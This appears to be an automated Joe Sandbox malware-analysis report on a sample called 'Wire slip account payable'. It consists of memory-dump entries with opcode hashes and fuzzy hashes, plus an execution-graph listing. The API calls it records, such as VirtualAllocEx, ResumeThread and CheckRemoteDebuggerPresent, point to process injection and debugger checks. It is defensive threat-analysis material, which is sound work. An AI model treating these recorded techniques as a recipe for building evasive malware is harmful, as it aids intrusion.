                                                                                                                    • Opcode ID: 7fb879819e4865a6650be06771a09c2e2257f9bbf11bcac7ac059b84a9565d80
                                                                                                                    • Instruction ID: 23aa6323f92cf776af9442bf6e6b9ee5dfb3ba35ddff742b70b3a7536ea928ef
                                                                                                                    • Opcode Fuzzy Hash: 7fb879819e4865a6650be06771a09c2e2257f9bbf11bcac7ac059b84a9565d80
                                                                                                                    • Instruction Fuzzy Hash: 6C2138B19003098FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB78A944CFA4
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D677
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 5f1439312662e10d5bd174cb6f5373927d596ec6b59ab08cc84d025b3100357f
                                                                                                                    • Instruction ID: b5b849363f57a5d9e4e387f16e00d3f320908789aaae68b7abc82d6f544da235
                                                                                                                    • Opcode Fuzzy Hash: 5f1439312662e10d5bd174cb6f5373927d596ec6b59ab08cc84d025b3100357f
                                                                                                                    • Instruction Fuzzy Hash: E721C4B5900258DFDB10CF9AD584ADEBFF4FB48324F14841AE958A7350D374A944CFA5
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D677
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 16718334e13e3296d21d9508e3f45e5f35454174cc60afb2c26bc278f7c0ac9f
                                                                                                                    • Instruction ID: 4fd7ff6ca62775cd3409c7224fe3ef685da9df191542152da74b7846128d9536
                                                                                                                    • Opcode Fuzzy Hash: 16718334e13e3296d21d9508e3f45e5f35454174cc60afb2c26bc278f7c0ac9f
                                                                                                                    • Instruction Fuzzy Hash: 3421E2B6900258DFDB10CFAAD584AEEBFF4FB48324F14841AE958A7310C378A940CF64
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07497C96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 42c03e5ddd69601d02fb78cc7583a5c1e9952fc0571b6f03cdd5c10906451abc
                                                                                                                    • Instruction ID: bbb951f2bd4d8d11a78184f57d8660dd892852a0f8b3c63bc27f7325680c7deb
                                                                                                                    • Opcode Fuzzy Hash: 42c03e5ddd69601d02fb78cc7583a5c1e9952fc0571b6f03cdd5c10906451abc
                                                                                                                    • Instruction Fuzzy Hash: 53118CB19002489FCF20DFAAD8046EEBFF5EB88324F10882AD415A7210C7359540CFA4
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 8eb309267af9f6b9e6e91bb84e324047e0ef6f4b0fd4e7341faaa12775fd8466
                                                                                                                    • Instruction ID: cfdd647188af6db53c5f459f61b2a550b3df420e36bf72bc41139c5aa548a1e3
                                                                                                                    • Opcode Fuzzy Hash: 8eb309267af9f6b9e6e91bb84e324047e0ef6f4b0fd4e7341faaa12775fd8466
                                                                                                                    • Instruction Fuzzy Hash: CE116DB19003488FCB10DFAAD4457EEFFF4EB88324F20882AD459A7640CB356545CFA5
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07497C96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: f3f215eca68f072f34b15668ed4e16374df91dfe7e329b90cd17f7f45e94d882
                                                                                                                    • Instruction ID: dadcbe6e85076cf24548518b7c1f0ea07411302b518533ddc86c61718ed3c4a6
                                                                                                                    • Opcode Fuzzy Hash: f3f215eca68f072f34b15668ed4e16374df91dfe7e329b90cd17f7f45e94d882
                                                                                                                    • Instruction Fuzzy Hash: 1F1126B19002499FCB10DFAAC844ADEBFF5EB88324F10882AE559A7250C775A544CFA4
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0749C3F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 530bff688c2db7dcab047e912ef3e5f454734cc70bd4df090f72b86968885adf
                                                                                                                    • Instruction ID: a3e38c617ff6c95e71ba706f75b3f1d5f1f0e7230997499600af030b7ca6e1df
                                                                                                                    • Opcode Fuzzy Hash: 530bff688c2db7dcab047e912ef3e5f454734cc70bd4df090f72b86968885adf
                                                                                                                    • Instruction Fuzzy Hash: 641125B58003499FDB20CF9AD485BDEFFF8EB48324F10881AE518A7640C374A584CFA5
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 5d0dc0c56166559f5383f24189ce3315ac2144f24fbed5f5c405fb2dcd2bddf0
                                                                                                                    • Instruction ID: 71c63fce35fcadb2ef173338235d23879694476bb0bb90b69cadd7b0b8917205
                                                                                                                    • Opcode Fuzzy Hash: 5d0dc0c56166559f5383f24189ce3315ac2144f24fbed5f5c405fb2dcd2bddf0
                                                                                                                    • Instruction Fuzzy Hash: 86113AB19003598FCB10DFAAC4457EEFFF4EB88324F20882AD459A7250CB75A544CFA4
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0749C3F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: b217f469c00c116d39256aae5a223f476362f92b6de3e863f29838d2e749d6cf
                                                                                                                    • Instruction ID: 348cfd71d7dbb0567a99a4718ce0a91b6a428af4c767b61edc43a989325bf887
                                                                                                                    • Opcode Fuzzy Hash: b217f469c00c116d39256aae5a223f476362f92b6de3e863f29838d2e749d6cf
                                                                                                                    • Instruction Fuzzy Hash: 2611F5B5800349DFDB20DF99D484BDEBFF8EB48324F10885AE558A7600C375A944CFA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0155AF5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: aa2551d8b7893c7b7ede4f7c3417515a1e9b40757b5f25ccc31a39fd32438d06
                                                                                                                    • Instruction ID: 778b1eb04f8f499ef7bde3884ea7ceefeee4e7ba69e5b626e31ff2b5c515501c
                                                                                                                    • Opcode Fuzzy Hash: aa2551d8b7893c7b7ede4f7c3417515a1e9b40757b5f25ccc31a39fd32438d06
                                                                                                                    • Instruction Fuzzy Hash: 12110FB5C002498FDB10CF9AC444ADEFBF4EF88224F10852AD928AB250C379A545CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6d91f7978549a252a3b23b8d39bcbf032ba59fbe79007b48d8f001643b6da9a
                                                                                                                    • Instruction ID: 2c7d3e067dbb801ad91c65a869e15844a1533a8b7875ab0fee6fbf6adb67b296
                                                                                                                    • Opcode Fuzzy Hash: b6d91f7978549a252a3b23b8d39bcbf032ba59fbe79007b48d8f001643b6da9a
                                                                                                                    • Instruction Fuzzy Hash: C5212571600240DFDB05DF58D9C0B2ABFA9FB88318F24C5A9E9894B656C336D456CBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7e600f94f04b1ebdfa8af6a45bb6f6c038a85b7ab0b179ceb68dcf46d370929
                                                                                                                    • Instruction ID: 6ec256b64f3b0510b7b2a49e4bff65572e6e8e2229ee74427f5028df7e97ca15
                                                                                                                    • Opcode Fuzzy Hash: f7e600f94f04b1ebdfa8af6a45bb6f6c038a85b7ab0b179ceb68dcf46d370929
                                                                                                                    • Instruction Fuzzy Hash: 86214871600244DFDB01DF48C9C0B5ABFA9FB98314F20C1A9E9894F256C736E846C7A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 79d356f667f44e108b46bf55e57291f76ce2f6edb8af079bbe35083b43a2b654
                                                                                                                    • Instruction ID: a2b75333de2392c91369fa2bd43fdbde8a26bd0206b4846b7c6ac961db99fb6d
                                                                                                                    • Opcode Fuzzy Hash: 79d356f667f44e108b46bf55e57291f76ce2f6edb8af079bbe35083b43a2b654
                                                                                                                    • Instruction Fuzzy Hash: DB210471A04200EFDB05DF98D9C0B2ABBA5FF94324F24C6ADE9894B256C336D447CB65
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4e96e73d760a2c90cb445965bb81a1971e18f3fed43586fafde793a24240560e
                                                                                                                    • Instruction ID: 30f37c9ffe6958a6068b2bcfdba37a570956b6de83927c37e796d9b8a61d614b
                                                                                                                    • Opcode Fuzzy Hash: 4e96e73d760a2c90cb445965bb81a1971e18f3fed43586fafde793a24240560e
                                                                                                                    • Instruction Fuzzy Hash: 46212271A04200DFCB16DF58D984B2ABFA5EF84314F20C5ADE98A4B256C33AD447CBA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff30d37f7c83dc63975b6c36228a96a11d30e8bf8aa7221e03cfe05d5234b817
                                                                                                                    • Instruction ID: f0e57596cde19eb1b28b16b3940b6dc7a40a4968b3885ae15f200660fddb0086
                                                                                                                    • Opcode Fuzzy Hash: ff30d37f7c83dc63975b6c36228a96a11d30e8bf8aa7221e03cfe05d5234b817
                                                                                                                    • Instruction Fuzzy Hash: CE2165755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction ID: 97763d7edb302b1a8d3aa2f29622a22bd19448b46afcf8cbbadea57208e0ea5d
                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction Fuzzy Hash: D9110372504240CFDB02CF44D5C4B56BFB1FB94324F24C2A9D9890B257C33AE85ACBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction ID: b1a42d726213726e1c537da8eaac259eea258281e860770896eff42ed92b74cb
                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                    • Instruction Fuzzy Hash: 5711D376504280CFDB16CF54D5C4B16BFB1FB84318F24C6AAD9890B657C336D45ACBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738471469.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_107d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction ID: b54ee5643c3b73e5d2d1e3cbbcbdc7ea6343b1f48a8c9d57739f9b1f393b50c9
                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction Fuzzy Hash: AF11BB75904280DFDB02CF54C5C4B15BFA1FF84224F28C6AADC894B296C33AD40BCB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: af4b47227d6fa2e32b4dfe73f2f63f5e67982cab86ac86a1cb5482b4c4b77db2
                                                                                                                    • Instruction ID: 97a757968f866760b3bcc192488f2a73026be3da5c98f4ea3e3f0ff10317c16e
                                                                                                                    • Opcode Fuzzy Hash: af4b47227d6fa2e32b4dfe73f2f63f5e67982cab86ac86a1cb5482b4c4b77db2
                                                                                                                    • Instruction Fuzzy Hash: C401F7312083849AE7504A69CD84B6BBFDCFF41324F18C86AED884A286D23D9840C772
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1738371185.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_106d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 91e1d27843db9f7bf7888e9df9f9ca9df2e12103a0bc21ee22d07ca9faf4f508
                                                                                                                    • Instruction ID: 078b83b8f1a7cbcb0df878d78c484626ae7c38613a9e31c1fcea78d1291ead3e
                                                                                                                    • Opcode Fuzzy Hash: 91e1d27843db9f7bf7888e9df9f9ca9df2e12103a0bc21ee22d07ca9faf4f508
                                                                                                                    • Instruction Fuzzy Hash: F9F062715043849EE7518E1ADC84B62FFECFF51638F18C49AED885A286D2799844CBB1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MS
                                                                                                                    • API String ID: 0-724152689
                                                                                                                    • Opcode ID: c6c98f174c26d0f6ccd3a047e06b7439ebe884eddb4eb0c9e863be64eebc94fd
                                                                                                                    • Instruction ID: b0ba7f00b98b14404e4919fbefe18eb147bd4a83423bdbc4cfa02e343244e3b5
                                                                                                                    • Opcode Fuzzy Hash: c6c98f174c26d0f6ccd3a047e06b7439ebe884eddb4eb0c9e863be64eebc94fd
                                                                                                                    • Instruction Fuzzy Hash: C1E1FAB4E105198FDB14DFA9C5809AEFBF2BF89304F24816AE414AB359DB31AD41CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 140ff209334f228ca96a19d6f3126e40761168ce4175858d76685d21ede2be8f
                                                                                                                    • Instruction ID: 17e933e3bd343738fd4bb12b11265dcbbedd1b333a423d5c68872f84f120519b
                                                                                                                    • Opcode Fuzzy Hash: 140ff209334f228ca96a19d6f3126e40761168ce4175858d76685d21ede2be8f
                                                                                                                    • Instruction Fuzzy Hash: 68E1EBB4E101198FDB14DFA9C5809AEFBF2BF89314F24816AE415AB356DB31AD41CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4bc6bc8e0b27c29147648a4aef7ac8ead53dac2ad642f10749f5f7ef3c57fb04
                                                                                                                    • Instruction ID: f88578f12851cd43d875a9744c8f9e9312151385459d0da42ed59e1bb2a2b27e
                                                                                                                    • Opcode Fuzzy Hash: 4bc6bc8e0b27c29147648a4aef7ac8ead53dac2ad642f10749f5f7ef3c57fb04
                                                                                                                    • Instruction Fuzzy Hash: CEE1E7B4E101199FCB14DFA9C5809AEFBF2BF89304F25816AE414AB356DB31AD41CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dda998e1e6307d240cac4b9e1637888bfd60459d464dbef91cf3f35726a5d388
                                                                                                                    • Instruction ID: 18ce523563510af6de19ee4b3f4f6004ca42c9d2e4a69c60be820a505d6edec4
                                                                                                                    • Opcode Fuzzy Hash: dda998e1e6307d240cac4b9e1637888bfd60459d464dbef91cf3f35726a5d388
                                                                                                                    • Instruction Fuzzy Hash: 14E1FBB4E101199FCB15DFA9C5809AEFBF2BF89305F24816AE414AB356DB31AD41CF60
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7013f122a49dcf9b4527446c7402e32d493dd5c221d7520763c6da1400289fe8
                                                                                                                    • Instruction ID: 81aea6a685a017a914f5e69158806704f463910fc399352b49e1affa3f68eea2
                                                                                                                    • Opcode Fuzzy Hash: 7013f122a49dcf9b4527446c7402e32d493dd5c221d7520763c6da1400289fe8
                                                                                                                    • Instruction Fuzzy Hash: 7BE1F9B4E101199FCB15DFA9C5809AEFBF2BF89304F24816AE414AB356DB31AD41CF61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b0b1596ae4f4efb0bf6efdd0bf3e25708859f2fef49d0b618e829b934fbcbad4
                                                                                                                    • Instruction ID: d6eb240af83c8ca4f34330ac9389a4ad904e85e6177e156b00aedd49aa01fe8a
                                                                                                                    • Opcode Fuzzy Hash: b0b1596ae4f4efb0bf6efdd0bf3e25708859f2fef49d0b618e829b934fbcbad4
                                                                                                                    • Instruction Fuzzy Hash: 19A17E32E1020A8FCF15DFB4C85459EBBB6FF85300B1585ABE906AF265DB31E946CB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a9946016e9c8767eb59d488683c81df52206312651400898bfc6b2334657cfe8
                                                                                                                    • Instruction ID: b6dd56a98238254e54895b0d20258df7802854e139e2b5989b88730ac702574a
                                                                                                                    • Opcode Fuzzy Hash: a9946016e9c8767eb59d488683c81df52206312651400898bfc6b2334657cfe8
                                                                                                                    • Instruction Fuzzy Hash: A651F8B1E002198BCB15DFA9C5805EEFBF2BB89304F24816AD418A7356DB319942CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31a9e66f9661c35dcdbbb35a24cd0620d135ee504898a535bda6056ddaf80c24
                                                                                                                    • Instruction ID: c4e99c7e3c17996ac2ba2ebdd925c7607573e017fd72db5c1db070eb2a357c28
                                                                                                                    • Opcode Fuzzy Hash: 31a9e66f9661c35dcdbbb35a24cd0620d135ee504898a535bda6056ddaf80c24
                                                                                                                    • Instruction Fuzzy Hash: 2A51F9B5E102198FCB14DFA9D9805EEFBF2BF89304F24816AD418A7316DB319941CFA1

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:4.9%
                                                                                                                    Total number of Nodes:61
                                                                                                                    Total number of Limit Nodes:7
                                                                                                                    execution_graph 39535 11b0848 39537 11b084e 39535->39537 39536 11b091b 39537->39536 39539 11b1330 39537->39539 39540 11b1333 39539->39540 39541 11b1283 39539->39541 39540->39541 39543 11b8210 39540->39543 39541->39537 39544 11b821a 39543->39544 39546 11b825c 39544->39546 39551 685f979 39544->39551 39555 685f988 39544->39555 39545 11b822d 39559 11bf150 39545->39559 39563 11bf160 39545->39563 39546->39540 39553 685f97c 39551->39553 39552 685fbb2 39552->39545 39553->39552 39554 685fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 39553->39554 39554->39553 39557 685f99d 39555->39557 39556 685fbb2 39556->39545 39557->39556 39558 685fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 39557->39558 39558->39557 39560 11bf160 39559->39560 39561 11bf3c1 39560->39561 39562 685fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 39560->39562 39561->39546 39562->39560 39564 11bf17a 39563->39564 39565 11bf3c1 39564->39565 39566 685fbc7 GlobalMemoryStatusEx GlobalMemoryStatusEx 39564->39566 39565->39546 39566->39564 39567 694f960 39568 694f962 39567->39568 39569 694f99d 39568->39569 39572 694fbd8 39568->39572 39576 694fbc9 39568->39576 39581 694fc28 39572->39581 39590 694fc19 39572->39590 39573 694fbe2 39573->39569 39577 694fbcc 39576->39577 39579 694fc28 2 API calls 39577->39579 39580 694fc19 2 API calls 39577->39580 39578 694fbe2 39578->39569 39579->39578 39580->39578 39582 694fc2a 39581->39582 39585 694fc5c 39582->39585 39599 694eb7c 39582->39599 39585->39573 39586 694fc54 39586->39585 39587 694fe60 GetModuleHandleW 39586->39587 39588 694fe8d 39587->39588 39588->39573 39591 694fc1c 39590->39591 39592 694eb7c GetModuleHandleW 39591->39592 39594 694fc5c 39591->39594 39593 694fc44 39592->39593 39593->39594 39598 694feb0 GetModuleHandleW 39593->39598 39594->39573 39595 694fc54 39595->39594 39596 694fe60 GetModuleHandleW 39595->39596 39597 694fe8d 39596->39597 39597->39573 39598->39595 39601 694fe18 GetModuleHandleW 39599->39601 39602 694fc44 39601->39602 39602->39585 39603 694feb0 39602->39603 39604 694feb4 39603->39604 39605 694eb7c GetModuleHandleW 39604->39605 39606 694fed4 39605->39606 39606->39586 39532 11b7050 39533 11b7094 CheckRemoteDebuggerPresent 39532->39533 39534 11b70d6 39533->39534

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
